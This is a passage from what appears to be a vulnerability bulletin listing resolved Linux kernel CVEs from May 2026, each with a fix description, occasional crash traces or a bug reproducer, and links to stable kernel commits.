| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bnxt_en: Fix RSS context delete logic We need to free the corresponding RSS context VNIC in FW everytime an RSS context is deleted in driver. Commit 667ac333dbb7 added a check to delete the VNIC in FW only when netif_running() is true to help delete RSS contexts with interface down. Having that condition will make the driver leak VNICs in FW whenever close() happens with active RSS contexts. On the subsequent open(), as part of RSS context restoration, we will end up trying to create extra VNICs for which we did not make any reservation. FW can fail this request, thereby making us lose active RSS contexts. Suppose an RSS context is deleted already and we try to process a delete request again, then the HWRM functions will check for validity of the request and they simply return if the resource is already freed. So, even for delete-when-down cases, netif_running() check is not necessary. Remove the netif_running() condition check when deleting an RSS context. | 2026-05-06 | not yet calculated | CVE-2026-43260 | https://git.kernel.org/stable/c/348a5f8d06c7bdf954e13c17ad5f80b59a075604 https://git.kernel.org/stable/c/079986d6db1f8e3d50c55f400cf998ac9690d2c8 https://git.kernel.org/stable/c/9a9b89eea4a9cc7726702946ff688d716962fabd https://git.kernel.org/stable/c/e123d9302d223767bd910bfbcfe607bae909f8ac |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: arm64: Add support for TSV110 Spectre-BHB mitigation The TSV110 processor is vulnerable to the Spectre-BHB (Branch History Buffer) attack, which can be exploited to leak information through branch prediction side channels. This commit adds the MIDR of TSV110 to the list for software mitigation. | 2026-05-06 | not yet calculated | CVE-2026-43261 | https://git.kernel.org/stable/c/598c11dd4f4a9de31d854fcb9702f54c1c70f0d0 https://git.kernel.org/stable/c/a8d0ad5d990b050a6db74218a34b5529085e16b8 https://git.kernel.org/stable/c/cccf96c49f61e47d9332d6a4d1c7fe9a2df44440 https://git.kernel.org/stable/c/fd7e360845d331f542854d552469544182e61134 https://git.kernel.org/stable/c/5dbe1f14359735fa50ba0dd4a496125b5bc7f422 https://git.kernel.org/stable/c/fd51d47fcacec3ca027eb65d8c44853d3b6cea95 https://git.kernel.org/stable/c/ad0c356cae164ed5dbd1f4cfd438e46faa5292cb https://git.kernel.org/stable/c/e3baa5d4b361276efeb87b20d8beced451a7dbd5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gfs2: fiemap page fault fix In gfs2_fiemap(), we are calling iomap_fiemap() while holding the inode glock. This can lead to recursive glock taking if the fiemap buffer is memory mapped to the same inode and accessing it triggers a page fault. Fix by disabling page faults for iomap_fiemap() and faulting in the buffer by hand if necessary. Fixes xfstest generic/742. | 2026-05-06 | not yet calculated | CVE-2026-43262 | https://git.kernel.org/stable/c/5d5d9ec957bfa1eb2b05861c19f5d701dd006db7 https://git.kernel.org/stable/c/cead3bebf3e318578b8a86a5472015d713d2a8a8 https://git.kernel.org/stable/c/e428670cfb2993d8c224effd076242ca6b0950de https://git.kernel.org/stable/c/5d2c4f182ea8516de8682e2b60411c03df00e3ea https://git.kernel.org/stable/c/2e121c53b581e40397ae08090a7af4ed10781fbc https://git.kernel.org/stable/c/9d15fee888f0e8938c9aeed71ec9c2cbba0c88ab https://git.kernel.org/stable/c/e411d74cc5ba290f85d0dd5e4d1df8f1d6d975d2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbdev: of: display_timing: fix refcount leak in of_get_display_timings() of_parse_phandle() returns a device_node with refcount incremented, which is stored in 'entry' and then copied to 'native_mode'. When the error paths at lines 184 or 192 jump to 'entryfail', native_mode's refcount is not decremented, causing a refcount leak. Fix this by changing the goto target from 'entryfail' to 'timingfail', which properly calls of_node_put(native_mode) before cleanup. | 2026-05-06 | not yet calculated | CVE-2026-43264 | https://git.kernel.org/stable/c/20881ad42e651c69d89eb38a2042838187900fd6 https://git.kernel.org/stable/c/b5bdcc5afbff845834d04d651773cb6b47db5dd3 https://git.kernel.org/stable/c/2b22e4fe1273c24f405ed7903349c4bbd82b6368 https://git.kernel.org/stable/c/3ed019654234edb8625c05d05e15d40f74e64f70 https://git.kernel.org/stable/c/d6f34bbff07476c6abb8672c89d217824871c5ed https://git.kernel.org/stable/c/69290f2d3999c5fa1a7f5d5593cfc5461fa3ee64 https://git.kernel.org/stable/c/c5734f9030a8b1e13868d1641b5163d8e659306e https://git.kernel.org/stable/c/eacf9840ae1285a1ef47eb0ce16d786e542bd4d7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: x86: Ignore -EBUSY when checking nested events from vcpu_block() Ignore -EBUSY when checking nested events after exiting a blocking state while L2 is active, as exiting to userspace will generate a spurious userspace exit, usually with KVM_EXIT_UNKNOWN, and likely lead to the VM's demise. Continuing with the wakeup isn't perfect either, as *something* has gone sideways if a vCPU is awakened in L2 with an injected event (or worse, a nested run pending), but continuing on gives the VM a decent chance of surviving without any major side effects. As explained in the Fixes commits, it _should_ be impossible for a vCPU to be put into a blocking state with an already-injected event (exception, IRQ, or NMI). Unfortunately, userspace can stuff MP_STATE and/or injected events, and thus put the vCPU into what should be an impossible state. Don't bother trying to preserve the WARN, e.g. with an anti-syzkaller Kconfig, as WARNs can (hopefully) be added in paths where _KVM_ would be violating x86 architecture, e.g. by WARNing if KVM attempts to inject an exception or interrupt while the vCPU isn't running. | 2026-05-06 | not yet calculated | CVE-2026-43265 | https://git.kernel.org/stable/c/78265cd066d73a5cb41c088fcae4a2515e480d97 https://git.kernel.org/stable/c/ec3be7dc9391085a2d96700e159d66d1328b7ff6 https://git.kernel.org/stable/c/2657439265d34a911886b916ba8be97ecc117d51 https://git.kernel.org/stable/c/1e88b5f854bdb469424132e0bb44793ad7a7c20a https://git.kernel.org/stable/c/1c957773063ed3264953597e32990a748381caf6 https://git.kernel.org/stable/c/ead63640d4e72e6f6d464f4e31f7fecb79af8869 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: EFI/CPER: don't go past the ARM processor CPER record buffer There's a logic inside GHES/CPER to detect if the section_length is too small, but it doesn't detect if it is too big. Currently, if the firmware receives an ARM processor CPER record stating that a section length is big, kernel will blindly trust section_length, producing a very long dump. For instance, a 67 bytes record with ERR_INFO_NUM set 46198 and section length set to 854918320 would dump a lot of data going a way past the firmware memory-mapped area. Fix it by adding a logic to prevent it to go past the buffer if ERR_INFO_NUM is too big, making it report instead: [Hardware Error]: Hardware error from APEI Generic Hardware Error Source: 1 [Hardware Error]: event severity: recoverable [Hardware Error]: Error 0, type: recoverable [Hardware Error]: section_type: ARM processor error [Hardware Error]: MIDR: 0xff304b2f8476870a [Hardware Error]: section length: 854918320, CPER size: 67 [Hardware Error]: section length is too big [Hardware Error]: firmware-generated error record is incorrect [Hardware Error]: ERR_INFO_NUM is 46198 [ rjw: Subject and changelog tweaks ] | 2026-05-06 | not yet calculated | CVE-2026-43266 | https://git.kernel.org/stable/c/c80113dcfc807308f5ab33847fae77e07531aeb8 https://git.kernel.org/stable/c/ca2aad8771aa9091bc9e42e7d546bd40b72ddcd4 https://git.kernel.org/stable/c/a68d22902a6916e10ee235fee609239004e129d0 https://git.kernel.org/stable/c/64eb63f573f497553e1a0c388bbcdd639e0f0704 https://git.kernel.org/stable/c/be10c1bdf64a39832998f54900aa309b3917abcf https://git.kernel.org/stable/c/25b290624b0e3d2f0f90238709ee0b6009b9fde8 https://git.kernel.org/stable/c/45766863baf899059e75595dd3cb1116467f2095 https://git.kernel.org/stable/c/eae21beecb95a3b69ee5c38a659f774e171d730e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtw89: fix potential zero beacon interval in beacon tracking During fuzz testing, it was discovered that bss_conf->beacon_int might be zero, which could result in a division by zero error in subsequent calculations. Set a default value of 100 TU if the interval is zero to ensure stability. | 2026-05-06 | not yet calculated | CVE-2026-43267 | https://git.kernel.org/stable/c/1260bee01493126cf9c872b6ca2af261173baa6d https://git.kernel.org/stable/c/e00c9a4ec84c0bb067833b34202f457badbbc1c1 https://git.kernel.org/stable/c/eb57be32f438c57c88d6ce756101c1dfbcc03bba |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfsplus: pretend special inodes as regular files Since commit af153bb63a33 ("vfs: catch invalid modes in may_open()") requires any inode be one of S_IFDIR/S_IFLNK/S_IFREG/S_IFCHR/S_IFBLK/ S_IFIFO/S_IFSOCK type, use S_IFREG for special inodes. | 2026-05-06 | not yet calculated | CVE-2026-43268 | https://git.kernel.org/stable/c/dcac5582f90b55a267d89769073c5651990b2ec5 https://git.kernel.org/stable/c/799c492a619a10322543d13e6d2a6d27335c868c https://git.kernel.org/stable/c/676bc99d0b3e356cdfec5d8204518e1aac14ec84 https://git.kernel.org/stable/c/de9affb698d5034888314880736925c39d6d048e https://git.kernel.org/stable/c/d209ebaee93fc5089101d34d1b38a91d7abb03fd https://git.kernel.org/stable/c/67407d6abc9520a8a4661285b3ed294eb73ff6e7 https://git.kernel.org/stable/c/9353d4ee26dc33f6ada1646e84660f4c59189763 https://git.kernel.org/stable/c/ed8889ca21b6ab37bc1435c4009ce37a79acb9e6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/atmel-hlcdc: fix memory leak from the atomic_destroy_state callback After several commits, the slab memory increases. Some drm_crtc_commit objects are not freed. The atomic_destroy_state callback only put the framebuffer. Use the __drm_atomic_helper_plane_destroy_state() function to put all the objects that are no longer needed. It has been seen after hours of usage of a graphics application or using kmemleak: unreferenced object 0xc63a6580 (size 64): comm "egt_basic", pid 171, jiffies 4294940784 hex dump (first 32 bytes): 40 50 34 c5 01 00 00 00 ff ff ff ff 8c 65 3a c6 @P4..........e:. 8c 65 3a c6 ff ff ff ff 98 65 3a c6 98 65 3a c6 .e:......e:..e:. backtrace (crc c25aa925): kmemleak_alloc+0x34/0x3c __kmalloc_cache_noprof+0x150/0x1a4 drm_atomic_helper_setup_commit+0x1e8/0x7bc drm_atomic_helper_commit+0x3c/0x15c drm_atomic_commit+0xc0/0xf4 drm_atomic_helper_set_config+0x84/0xb8 drm_mode_setcrtc+0x32c/0x810 drm_ioctl+0x20c/0x488 sys_ioctl+0x14c/0xc20 ret_fast_syscall+0x0/0x54 | 2026-05-06 | not yet calculated | CVE-2026-43269 | https://git.kernel.org/stable/c/6d4e91ab97fda64e8cf9c8881cc3b4da026bd849 https://git.kernel.org/stable/c/5718d98976ad6b9700e5a6afec67fc47a8a92580 https://git.kernel.org/stable/c/57fa3487acfa3467405f8506b94682abd96e7393 https://git.kernel.org/stable/c/ec40702029b08ee8d5f5b03303d64a10e74a957b https://git.kernel.org/stable/c/25e832a7830740e72103eb0b527680a4b64bbcb3 https://git.kernel.org/stable/c/082271e364a3205598c2e4e6233a9f49ce7941cf https://git.kernel.org/stable/c/3e64e78f4a70e3f6ac8fe5a7071f08ffd25a2489 https://git.kernel.org/stable/c/f12352471061df83a36edf54bbb16284793284e4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: mtk-mdp: Fix a reference leak bug in mtk_mdp_remove() In mtk_mdp_probe(), vpu_get_plat_device() increases the reference count of the returned platform device. Add platform_device_put() to prevent reference leak. | 2026-05-06 | not yet calculated | CVE-2026-43270 | https://git.kernel.org/stable/c/403b7c757ac9f6b2ffb7d00ff4795a245f5e8911 https://git.kernel.org/stable/c/dd530e29bd514d7187b3e2df8eb2107419c7988f https://git.kernel.org/stable/c/c44beed2e5caf2cbbe651432baa3a129f18b0169 https://git.kernel.org/stable/c/564fd3a63efc3ebbdb5d0a8fc7c0d3f753fbbd5d https://git.kernel.org/stable/c/4f2a51433a3a65d16975d1e32052d80656da077d https://git.kernel.org/stable/c/a62ba5aa9ee95fd953583e95e519badf0b76ecf3 https://git.kernel.org/stable/c/2d93758f42a57f3485534eab858b308e41653de4 https://git.kernel.org/stable/c/f128bab57b8018e526b7eda854ca20069863af47 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md-cluster: fix NULL pointer dereference in process_metadata_update The function process_metadata_update() blindly dereferences the 'thread' pointer (acquired via rcu_dereference_protected) within the wait_event() macro. While the code comment states "daemon thread must exist", there is a valid race condition window during the MD array startup sequence (md_run): 1. bitmap_load() is called, which invokes md_cluster_ops->join(). 2. join() starts the "cluster_recv" thread (recv_daemon). 3. At this point, recv_daemon is active and processing messages. 4. However, mddev->thread (the main MD thread) is not initialized until later in md_run(). If a METADATA_UPDATED message is received from a remote node during this specific window, process_metadata_update() will be called while mddev->thread is still NULL, leading to a kernel panic. To fix this, we must validate the 'thread' pointer. If it is NULL, we release the held lock (no_new_dev_lockres) and return early, safely ignoring the update request as the array is not yet fully ready to process it. | 2026-05-06 | not yet calculated | CVE-2026-43271 | https://git.kernel.org/stable/c/a61c1bc84c4a0f1e7c2fe55b0f43d7d94af4adf1 https://git.kernel.org/stable/c/dec123825c1ed74d98fd5fc7571a851dea4f46ff https://git.kernel.org/stable/c/721599e837d3f4c0e6cc14da059612c017b6d3ec https://git.kernel.org/stable/c/dceb5a843910004cb118148e267036104fc3ee43 https://git.kernel.org/stable/c/f150e753cb8dd756085f46e86f2c35ce472e0a3c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ring-buffer: Fix possible dereference of uninitialized pointer There is a pointer head_page in rb_meta_validate_events() which is not initialized at the beginning of a function. This pointer can be dereferenced if there is a failure during reader page validation. In this case the control is passed to "invalid" label where the pointer is dereferenced in a loop. To fix the issue initialize orig_head and head_page before calling rb_validate_buffer. Found by Linux Verification Center (linuxtesting.org) with SVACE. | 2026-05-06 | not yet calculated | CVE-2026-43272 | https://git.kernel.org/stable/c/bc77986f3cb7476637052edf2d87137fa39f153d https://git.kernel.org/stable/c/d9942396845fef2369478c157b26738fe07142f6 https://git.kernel.org/stable/c/f1547779402c4cd67755c33616b7203baa88420b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ceph: supply snapshot context in ceph_zero_partial_object() The ceph_zero_partial_object function was missing proper snapshot context for its OSD write operations, which could lead to data inconsistencies in snapshots. Reproducer: ../src/vstart.sh --new -x --localhost --bluestore ./bin/ceph auth caps client.fs_a mds 'allow rwps fsname=a' mon 'allow r fsname=a' osd 'allow rw tag cephfs data=a' mount -t ceph fs_a@.a=/ /mnt/mycephfs/ -o conf=./ceph.conf dd if=/dev/urandom of=/mnt/mycephfs/foo bs=64K count=1 mkdir /mnt/mycephfs/.snap/snap1 md5sum /mnt/mycephfs/.snap/snap1/foo fallocate -p -o 0 -l 4096 /mnt/mycephfs/foo echo 3 > /proc/sys/vm/drop/caches md5sum /mnt/mycephfs/.snap/snap1/foo # get different md5sum!! | 2026-05-06 | not yet calculated | CVE-2026-43273 | https://git.kernel.org/stable/c/36673344b41c31fb502dd0d0113cec1aa96f581e https://git.kernel.org/stable/c/5788b742007f53406049bef917833a71ddd43f60 https://git.kernel.org/stable/c/757873abfc8ea38592582180aed0f57f0f0cb07a https://git.kernel.org/stable/c/9efa154609cdb658f51c7d76b30a09f7e6485250 https://git.kernel.org/stable/c/531a76c5a2e44264cee8a70121e63eb28c1ba728 https://git.kernel.org/stable/c/69e59a87bab0ea31ab2a584fc65e12dafacf8953 https://git.kernel.org/stable/c/4097e70fc543cca72982854108a32f6ae924e727 https://git.kernel.org/stable/c/f16bd3fa74a2084ee7e16a8a2be7e7399b970907 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: core: Flush exception handling work when RPM level is zero Ensure that the exception event handling work is explicitly flushed during suspend when the runtime power management level is set to UFS_PM_LVL_0. When the RPM level is zero, the device power mode and link state both remain active. Previously, the UFS core driver bypassed flushing exception event handling jobs in this configuration. This created a race condition where the driver could attempt to access the host controller to handle an exception after the system had already entered a deep power-down state, resulting in a system crash. Explicitly flush this work and disable auto BKOPs before the suspend callback proceeds. This guarantees that pending exception tasks complete and prevents illegal hardware access during the power-down sequence. | 2026-05-06 | not yet calculated | CVE-2026-43275 | https://git.kernel.org/stable/c/d5c3a1a13f97355c397f9439d79cb04b182958a3 https://git.kernel.org/stable/c/5d186731bc335cc049d4e57ab9f563cfab95593e https://git.kernel.org/stable/c/aa8d68d97c7f0ef966e51afc17fdbdc372700edf https://git.kernel.org/stable/c/aac2fee7513dd25042a616f86a1469b4858d2c5c https://git.kernel.org/stable/c/78d8e2d6352e8317686ee3a44811ac14c415a57d https://git.kernel.org/stable/c/ab71c146c135f9af1614ef0fc29a0a3b84f1a373 https://git.kernel.org/stable/c/f8ef441811ec413717f188f63d99182f30f0f08e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: mana: Fix double destroy_workqueue on service rescan PCI path While testing corner cases in the driver, a use-after-free crash was found on the service rescan PCI path. When mana_serv_reset() calls mana_gd_suspend(), mana_gd_cleanup() destroys gc->service_wq. If the subsequent mana_gd_resume() fails with -ETIMEDOUT or -EPROTO, the code falls through to mana_serv_rescan() which triggers pci_stop_and_remove_bus_device(). This invokes the PCI .remove callback (mana_gd_remove), which calls mana_gd_cleanup() a second time, attempting to destroy the already- freed workqueue. Fix this by NULL-checking gc->service_wq in mana_gd_cleanup() and setting it to NULL after destruction. Call stack of issue for reference: [Sat Feb 21 18:53:48 2026] Call Trace: [Sat Feb 21 18:53:48 2026] <TASK> [Sat Feb 21 18:53:48 2026] mana_gd_cleanup+0x33/0x70 [mana] [Sat Feb 21 18:53:48 2026] mana_gd_remove+0x3a/0xc0 [mana] [Sat Feb 21 18:53:48 2026] pci_device_remove+0x41/0xb0 [Sat Feb 21 18:53:48 2026] device_remove+0x46/0x70 [Sat Feb 21 18:53:48 2026] device_release_driver_internal+0x1e3/0x250 [Sat Feb 21 18:53:48 2026] device_release_driver+0x12/0x20 [Sat Feb 21 18:53:48 2026] pci_stop_bus_device+0x6a/0x90 [Sat Feb 21 18:53:48 2026] pci_stop_and_remove_bus_device+0x13/0x30 [Sat Feb 21 18:53:48 2026] mana_do_service+0x180/0x290 [mana] [Sat Feb 21 18:53:48 2026] mana_serv_func+0x24/0x50 [mana] [Sat Feb 21 18:53:48 2026] process_one_work+0x190/0x3d0 [Sat Feb 21 18:53:48 2026] worker_thread+0x16e/0x2e0 [Sat Feb 21 18:53:48 2026] kthread+0xf7/0x130 [Sat Feb 21 18:53:48 2026] ? __pfx_worker_thread+0x10/0x10 [Sat Feb 21 18:53:48 2026] ? __pfx_kthread+0x10/0x10 [Sat Feb 21 18:53:48 2026] ret_from_fork+0x269/0x350 [Sat Feb 21 18:53:48 2026] ? __pfx_kthread+0x10/0x10 [Sat Feb 21 18:53:48 2026] ret_from_fork_asm+0x1a/0x30 [Sat Feb 21 18:53:48 2026] </TASK> | 2026-05-06 | not yet calculated | CVE-2026-43276 | https://git.kernel.org/stable/c/fa3c2f8d9152344a478abb847081c1b5f84a94f5 https://git.kernel.org/stable/c/a9a7c3203fdc4d4a8d8a7a3b1ed05d2bb4c6e77e https://git.kernel.org/stable/c/f975a0955276579e2176a134366ed586071c7c6a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: APEI/GHES: ensure that won't go past CPER allocated record The logic at ghes_new() prevents allocating too large records, by checking if they're bigger than GHES_ESTATUS_MAX_SIZE (currently, 64KB). Yet, the allocation is done with the actual number of pages from the CPER bios table location, which can be smaller. Yet, a bad firmware could send data with a different size, which might be bigger than the allocated memory, causing an OOPS: Unable to handle kernel paging request at virtual address fff00000f9b40000 Mem abort info: ESR = 0x0000000096000007 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x07: level 3 translation fault Data abort info: ISV = 0, ISS = 0x00000007, ISS2 = 0x00000000 CM = 0, WnR = 0, TnD = 0, TagAccess = 0 GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 swapper pgtable: 4k pages, 52-bit VAs, pgdp=000000008ba16000 [fff00000f9b40000] pgd=180000013ffff403, p4d=180000013fffe403, pud=180000013f85b403, pmd=180000013f68d403, pte=0000000000000000 Internal error: Oops: 0000000096000007 [#1] SMP Modules linked in: CPU: 0 UID: 0 PID: 303 Comm: kworker/0:1 Not tainted 6.19.0-rc1-00002-gda407d200220 #34 PREEMPT Hardware name: QEMU QEMU Virtual Machine, BIOS unknown 02/02/2022 Workqueue: kacpi_notify acpi_os_execute_deferred pstate: 214020c5 (nzCv daIF +PAN -UAO -TCO +DIT -SSBS BTYPE=--) pc : hex_dump_to_buffer+0x30c/0x4a0 lr : hex_dump_to_buffer+0x328/0x4a0 sp : ffff800080e13880 x29: ffff800080e13880 x28: ffffac9aba86f6a8 x27: 0000000000000083 x26: fff00000f9b3fffc x25: 0000000000000004 x24: 0000000000000004 x23: ffff800080e13905 x22: 0000000000000010 x21: 0000000000000083 x20: 0000000000000001 x19: 0000000000000008 x18: 0000000000000010 x17: 0000000000000001 x16: 00000007c7f20fec x15: 0000000000000020 x14: 0000000000000008 x13: 0000000000081020 x12: 0000000000000008 x11: ffff800080e13905 x10: ffff800080e13988 x9 : 0000000000000000 x8 : 0000000000000000 x7 : 0000000000000001 x6 : 0000000000000020 x5 : 0000000000000030 x4 : 00000000fffffffe x3 : 0000000000000000 x2 : ffffac9aba78c1c8 x1 : ffffac9aba76d0a8 x0 : 0000000000000008 Call trace: hex_dump_to_buffer+0x30c/0x4a0 (P) print_hex_dump+0xac/0x170 cper_estatus_print_section+0x90c/0x968 cper_estatus_print+0xf0/0x158 __ghes_print_estatus+0xa0/0x148 ghes_proc+0x1bc/0x220 ghes_notify_hed+0x5c/0xb8 notifier_call_chain+0x78/0x148 blocking_notifier_call_chain+0x4c/0x80 acpi_hed_notify+0x28/0x40 acpi_ev_notify_dispatch+0x50/0x80 acpi_os_execute_deferred+0x24/0x48 process_one_work+0x15c/0x3b0 worker_thread+0x2d0/0x400 kthread+0x148/0x228 ret_from_fork+0x10/0x20 Code: 6b14033f 540001ad a94707e2 f100029f (b8747b44) ---[ end trace 0000000000000000 ]--- Prevent that by taking the actual allocated are into account when checking for CPER length. [ rjw: Subject tweaks ] | 2026-05-06 | not yet calculated | CVE-2026-43277 | https://git.kernel.org/stable/c/92ba79074c58e65a6e32713758c5a9aecd33c2ea https://git.kernel.org/stable/c/616c120dcdf1ce96edcd818e38bce49667f80689 https://git.kernel.org/stable/c/f3740a1562445f36f08afab8af59e37117b3acdc https://git.kernel.org/stable/c/e0ec99115e135dbb58e11a0df007c7d4771d4a17 https://git.kernel.org/stable/c/b6be51a12441136fdf8c49b2525689fbea1856e1 https://git.kernel.org/stable/c/6f5d41984ad896736c23e2fff7c80e15c1319132 https://git.kernel.org/stable/c/98bd9b28d4d11e6739ad86524b4be4ada9025e60 https://git.kernel.org/stable/c/fa2408a24f8f0db14d9cfc613ef162dc267d7ad4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mailbox: Prevent out-of-bounds access in fw_mbox_index_xlate() Although it is guided that `#mbox-cells` must be at least 1, there are many instances of `#mbox-cells = <0>;` in the device tree. If that is the case and the corresponding mailbox controller does not provide `fw_xlate` and of_xlate` function pointers, `fw_mbox_index_xlate()` will be used by default and out-of-bounds accesses could occur due to lack of bounds check in that function. | 2026-05-06 | not yet calculated | CVE-2026-43281 | https://git.kernel.org/stable/c/2662ed331a69c0b551f78af58f12eb629a89a36f https://git.kernel.org/stable/c/31c4c67dec3362094a6747a171a4848e98542265 https://git.kernel.org/stable/c/01d9a8c2615d436b2b30c19c1afe9fcd5726ff6d https://git.kernel.org/stable/c/4caae8168d1b808c7d4ff481295292e3f97f90fb https://git.kernel.org/stable/c/f50b39fd7c72a8734153644ee945ca0d8b2e65ab https://git.kernel.org/stable/c/fcd7f96c783626c07ee3ed75fa3739a8a2052310 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/ionic: Fix potential NULL pointer dereference in ionic_query_port The function ionic_query_port() calls ib_device_get_netdev() without checking the return value which could lead to NULL pointer dereference, Fix it by checking the return value and return -ENODEV if the 'ndev' is NULL. | 2026-05-06 | not yet calculated | CVE-2026-43282 | https://git.kernel.org/stable/c/2b96156c927cd83c109e2e3946e6111dce73231f https://git.kernel.org/stable/c/81932a46dfd0db10a03f46f0b1c7ef946ac4552f https://git.kernel.org/stable/c/fd80bd7105f88189f47d465ca8cb7d115570de30 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/slab: do not access current->mems_allowed_seq if !allow_spin Lockdep complains when get_from_any_partial() is called in an NMI context, because current->mems_allowed_seq is seqcount_spinlock_t and not NMI-safe: ================================ WARNING: inconsistent lock state 6.19.0-rc5-kfree-rcu+ #315 Tainted: G N -------------------------------- inconsistent {INITIAL USE} -> {IN-NMI} usage. kunit_try_catch/9989 [HC1[1]:SC0[0]:HE0:SE1] takes: ffff889085799820 (&____s->seqcount#3){.-.-}-{0:0}, at: ___slab_alloc+0x58f/0xc00 {INITIAL USE} state was registered at: lock_acquire+0x185/0x320 kernel_init_freeable+0x391/0x1150 kernel_init+0x1f/0x220 ret_from_fork+0x736/0x8f0 ret_from_fork_asm+0x1a/0x30 irq event stamp: 56 hardirqs last enabled at (55): [<ffffffff850a68d7>] _raw_spin_unlock_irq+0x27/0x70 hardirqs last disabled at (56): [<ffffffff850858ca>] __schedule+0x2a8a/0x6630 softirqs last enabled at (0): [<ffffffff81536711>] copy_process+0x1dc1/0x6a10 softirqs last disabled at (0): [<0000000000000000>] 0x0 other info that might help us debug this: Possible unsafe locking scenario: CPU0 ---- lock(&____s->seqcount#3); <Interrupt> lock(&____s->seqcount#3); *** DEADLOCK *** According to Documentation/locking/seqlock.rst, seqcount_t is not NMI-safe and seqcount_latch_t should be used when read path can interrupt the write-side critical section. In this case, do not access current->mems_allowed_seq and avoid retry. | 2026-05-08 | not yet calculated | CVE-2026-43285 | https://git.kernel.org/stable/c/353dd9934447b9193643ae1afd938607a74d4915 https://git.kernel.org/stable/c/efd767ddcef0669bbd33c6a823ea0a88f06d4b29 https://git.kernel.org/stable/c/144080a5823b2dbd635acb6decf7ab23182664f3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/hugetlb: restore failed global reservations to subpool Commit a833a693a490 ("mm: hugetlb: fix incorrect fallback for subpool") fixed an underflow error for hstate->resv_huge_pages caused by incorrectly attributing globally requested pages to the subpool's reservation. Unfortunately, this fix also introduced the opposite problem, which would leave spool->used_hpages elevated if the globally requested pages could not be acquired. This is because while a subpool's reserve pages only accounts for what is requested and allocated from the subpool, its "used" counter keeps track of what is consumed in total, both from the subpool and globally. Thus, we need to adjust spool->used_hpages in the other direction, and make sure that globally requested pages are uncharged from the subpool's used counter. Each failed allocation attempt increments the used_hpages counter by how many pages were requested from the global pool. Ultimately, this renders the subpool unusable, as used_hpages approaches the max limit. The issue can be reproduced as follows: 1. Allocate 4 hugetlb pages 2. Create a hugetlb mount with max=4, min=2 3. Consume 2 pages globally 4. Request 3 pages from the subpool (2 from subpool + 1 from global) 4.1 hugepage_subpool_get_pages(spool, 3) succeeds. used_hpages += 3 4.2 hugetlb_acct_memory(h, 1) fails: no global pages left used_hpages -= 2 5. Subpool now has used_hpages = 1, despite not being able to successfully allocate any hugepages. It believes it can now only allocate 3 more hugepages, not 4. With each failed allocation attempt incrementing the used counter, the subpool eventually reaches a point where its used counter equals its max counter. At that point, any future allocations that try to allocate hugeTLB pages from the subpool will fail, despite the subpool not having any of its hugeTLB pages consumed by any user. Once this happens, there is no way to make the subpool usable again, since there is no way to decrement the used counter as no process is really consuming the hugeTLB pages. The underflow issue that the original commit fixes still remains fixed as well. Without this fix, used_hpages would keep on leaking if hugetlb_acct_memory() fails. | 2026-05-08 | not yet calculated | CVE-2026-43286 | https://git.kernel.org/stable/c/5eac1322a7b14b8cd05ec896618278b90fba7f39 https://git.kernel.org/stable/c/f055897c975d079a90af873c791ab58cf0f6f2a5 https://git.kernel.org/stable/c/1d3f9bb4c8af70304d19c22e30f5d16a2d589bb5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm: Account property blob allocations to memcg DRM_IOCTL_MODE_CREATEPROPBLOB allows userspace to allocate arbitrary-sized property blobs backed by kernel memory. Currently, the blob data allocation is not accounted to the allocating process's memory cgroup, allowing unprivileged users to trigger unbounded kernel memory consumption and potentially cause system-wide OOM. Mark the property blob data allocation with GFP_KERNEL_ACCOUNT so that the memory is properly charged to the caller's memcg. This ensures existing cgroup memory limits apply and prevents uncontrolled kernel memory growth without introducing additional policy or per-file limits. | 2026-05-08 | not yet calculated | CVE-2026-43287 | https://git.kernel.org/stable/c/b6117210ed349356f8e6027ff020b4d620bca42b https://git.kernel.org/stable/c/815fa29cab3c67bebb9d0b5f41145cdd3a14d04d https://git.kernel.org/stable/c/866e0c1a9e7244d58ed74853cb22b81e1900cfdd https://git.kernel.org/stable/c/bbfaa5761f589a81031b493cb01275a990d6fb25 https://git.kernel.org/stable/c/8e1664b9ee43608eb973d357ae5d858d30cbc9ca https://git.kernel.org/stable/c/cb8b9a1755fe9f38e4fb7f287486d7e7fab3dba4 https://git.kernel.org/stable/c/405fd652d8fedff219a8f48daf8f20e881e303ab https://git.kernel.org/stable/c/26b4309a3ab82a0697751cde52eb336c29c19035 |
